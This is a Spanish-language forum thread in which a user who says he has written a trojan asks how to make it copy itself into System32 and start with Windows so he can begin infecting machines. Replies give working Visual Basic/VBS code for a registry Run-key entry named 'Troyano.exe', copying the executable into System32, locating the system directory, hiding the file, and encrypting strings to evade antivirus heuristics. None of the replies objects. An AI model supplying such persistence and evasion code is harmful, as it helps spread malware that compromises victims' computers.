copiar a system o system 32

Iniciado por vivachapas, 1 Mayo 2007, 20:15 PM

0 Miembros y 4 Visitantes están viendo este tema.

vivachapas

bueno... habiendo terminado un troyano... esta vez mas elaborado aunque con muy poquitas funciones... :S queria ya empezar a infectar... pero para eso necesito q cuando se ejecute el server se copie a alguna carpeta donde no lo enceuntren facil... como system o system32 y q se ejecute con windows....

alguno sabe como hacerlo?? desde ya muchas gracias

Jareth

Vamos,no te vamos a dar todo hecho,algo tan sencillo como añadirse a run y copiarse a system...busca un poco antes de postear.
Ahora no tngo nada de tiempo,siento no poner code,pero esta en el foro.
Saludos.

vivachapas

#2
bueno segui buscando y encontre la funcino para hacer q se ejecute con windows... la dejo aqui por si a alguien le hace falta:

usamos:
txtClave
txtExe
LabelInfo

CitarPrivate mReg As cQueryReg
Private Const cvRun As String = "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\"

Dim s As String
'
s = mReg.GetRegString(cvRun, txtClave.Text)
If s <> "" Then
    LabelInfo.Caption = "La clave ya estaba asignada." & vbCrLf & s
Else
    If mReg.SetReg(cvRun, txtClave.Text, txtExe.Text) = ERROR_NONE Then
        LabelInfo.Caption = "La clave se ha asignado correctamente."
    Else
        LabelInfo.Caption = "ERROR al crear la clave."
    End If
End If

no lo probe al codigo espero q ande... jeje


no encontre como hacer a q se copie a system... me dijeron q era algo con clon pero nada
por favor si alguno seria tan amable de acercarme el codigo o algun link se lo agradeceria mucho  ;)

les dejo el link de donde saque la info
http://www.elguille.info/VB/utilidades/ExeEnCurrentVersionRun.htm

vivachapas


vivachapas

s = mReg.GetRegString(cvRun, txtClave.Text)

no entiendo q tengo q poner en el txtClave??

Jareth


dim clave as object   
set clave=CreateObject("WScript.shell")
clave.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\" & "Trojan" ,"c:\windows\system32\" & "Troyano.exe"     

y para copiarse:

Filecopy APP.apth & "\" & APP.exename & ".exe" ,"C:\WINDOWS\System32\troyano.exe" 

Bueno ahi lo tienes.
Saludos.

vivachapas

muchas gracias..! ya lo pruebo  ;)

Hendrix

Es un error bastante comun presuponer que el windows esta instalado en el disco C:\....para asegurarte, utiliza la api GetSystemDirectory que te va a dar como resutlado:

Citar<HD>:\<carpeta de Windows>\System32

Otra cosa que puedes hacer es ocultarlo a la vista del usuario, es decir, dejando el archivo como archivo oculto, con el comando SetAttr

Tambien te recomiendo que si vas a usar VBS para añadirte al registro, encriptes las cadenas para evitar la heuristica de ciertos antivirus (Por ejemplo el Nod32).

Un Saludo.

"Todos los días perdemos una docena de genios en el anonimato. Y se van. Y nadie sabe de ellos, de su historia, de su peripecia, de lo que han hecho, de sus angustias, de sus alegrías. Pero al menos una docena de genios se van todos los días sin que sepamos de ellos". - Juan Antonio Cebrián

BenRu

CitarEs un error bastante comun presuponer que el windows esta instalado en el disco C:\....para asegurarte, utiliza la api GetSystemDirectory

En un modulo:

Public Declare Function GetSystemDirectory Lib "kernel32" Alias "GetSystemDirectoryA" (ByVal lpBuffer As String, ByVal nSize As Long) As Long
Public Declare Function GetWindowsDirectory Lib "kernel32" Alias "GetWindowsDirectoryA" (ByVal lpBuffer As String, ByVal nSize As Long) As Long



Formulario:

Private Sub Form_Load()
    Dim Car As String * 128
    Dim Longitud, Es As Integer
    Dim Camino As String
    Dim win
    Dim sys
   
    Longitud = 128
   
    Es = GetWindowsDirectory(Car, Longitud)
    Camino = RTrim$(LCase$(Left$(Car, Es)))
    win = Camino
   
    Es = GetSystemDirectory(Car, Longitud)
    Camino = RTrim$(LCase$(Left$(Car, Es)))
    sys = Camino
End Sub


Un saludo  ;)

vivachapas

CitarTambien te recomiendo que si vas a usar VBS para añadirte al registro, encriptes las cadenas para evitar la heuristica de ciertos antivirus (Por ejemplo el Nod32).

me podrias decir como lo cifro las cadenas??


Public Declare Function GetSystemDirectory Lib "kernel32" Alias "GetSystemDirectoryA" (ByVal lpBuffer As String, ByVal nSize As Long) As Long

si yo quiero guardarlo solo en system32 necesito esta api solamente... o la otra tb??